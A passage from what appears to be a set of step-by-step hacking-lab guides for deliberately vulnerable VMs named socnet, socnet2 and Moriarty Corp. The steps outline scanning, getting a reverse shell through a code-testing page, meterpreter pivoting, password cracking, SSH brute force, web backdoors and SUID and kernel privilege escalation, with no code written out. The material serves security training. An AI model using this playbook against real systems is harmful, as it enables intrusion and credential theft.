b. Use the list for brute forcing port 22/SSH
8. Examine home directory of users and exploit vulnerable application to get root
a. Examine the left behind source code
b. Determine how to inject commands
c. Inject commands to gain root privileges!

Socnet/social network:
Goal: Get root privilege on the machine (hostname: socnet)
1. Start by port scanning. Locate socnet VM’s IP address.
a. Ports 22 and 5000 should be open. The MAC address should be 08:00:27:A6:E2:EC
2. Do an aggressive nmap scan on the target IP and find out which services are running
3. Visit the webpage on the target IP
a. Examine it for any vulnerabilities
4. Use dirb to scan the website for hidden pages
5. Use the input on the hidden page to test code
a. https://www.geeksforgeeks.org/exec-in-python/
b. Try Python’s time.sleep and see if the website will sleep and take longer to respond. Try a 5 second sleep then a 10 second sleep to observe the different response times.
6. Abuse the code testing functionality to get a reverse shell
a. http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
7. Setup a more stable reverse shell with meterpreter
a. https://netsec.ws/?p=331
b. Create the reverse shell binary
c. Transfer the binary to the target machine using a webserver on the attacker machine and running wget on the target machine
d. Use metasploit to handle meterpreter reverse shell
8. Utilize the ‘arp’ command in meterpreter to look for other machines on the target network
9. Utilize the ‘ifconfig’ command in meterpreter to get the target's network information
10. Using metasploit, setup a route via meterpreter session
11. Utilize auxiliary/scanner/portscan/tcp to scan other machines on the target network
12. Google open ports and find out what they’re used for
13. Utilize the meterpreter session to do port forwarding from your local machine to the machine with port 9200 open
14. Utilize curl to query the machine with port 9200 open and find out what’s running on it, including any version numbers
15. Exploit the service running on port 9200
a. Search for an exploit that works against the version of the service running on 9200
b. Utilize the exploit and gain shell access
c. Examine / directory for interesting files
16. Utilize the passwords file collected from the machine with port 9200 open, crack the passwords, and build a username and password list
a. https://crackstation.net/
17. Attack SSH running on the target machine with the username and password list
18. After logging in successfully on the target machine via SSH, gather machine information
a. Get OS info
b. Get kernel info
c. Arch info (64bit or 32bit)
19. Use a privesc exploit to get root privs
a. Utilize collected info to search for privesc exploits
b. Compile the privesc exploits and transfer the compiled files to the target system using SCP
c. Execute the exploits to finally get root privs

Socnet2/social network 2:
Goal: Get root privilege on the machine
1. Start by port scanning and locating socnet2 VM.
a. Ports 22, 80, and 8000 should be open. The MAC address should be 08:00:27:e9:e5:e6
2. Do an aggressive nmap scan and find more information about the services running
3. Visit webservers
4. Visit webserver on port 80 and examine it
a. Sign up
b. Explore the site
c. Look for any issues
5. Get a backdoor on the webserver
a. Utilize file upload functionality to get a backdoor on the webserver
b. Run the backdoor
6. Utilize the backdoor to find more information about what's running on port 8000
b. Be sure to read social network posts as well
7. Abuse the service running on port 8000 to get another shell
a. Examine the source code for the service running on port 8000
b. Write a custom tool/script to gain shell through service running on port 8000
i. https://docs.python.org/2/library/xmlrpclib.html
8. Load a meterpreter backdoor on the victim machine and utilize it to examine files in the user's directory
9. Write an exploit for SUID binary
a. Find the SUID binary in the user folder
b. Binary includes a backdoor function
i. https://github.com/radareorg/cutter
c. Download the binary, use a debugger and different inputs to trigger a crash, and control the EIP
d. Create a working exploit that launches backdoor function
10. Put the exploit on the victim machine and exploit the SUID binary to get root

Moriarty Corp:
Goal: Get all the flags

No guide or hints. Sorry.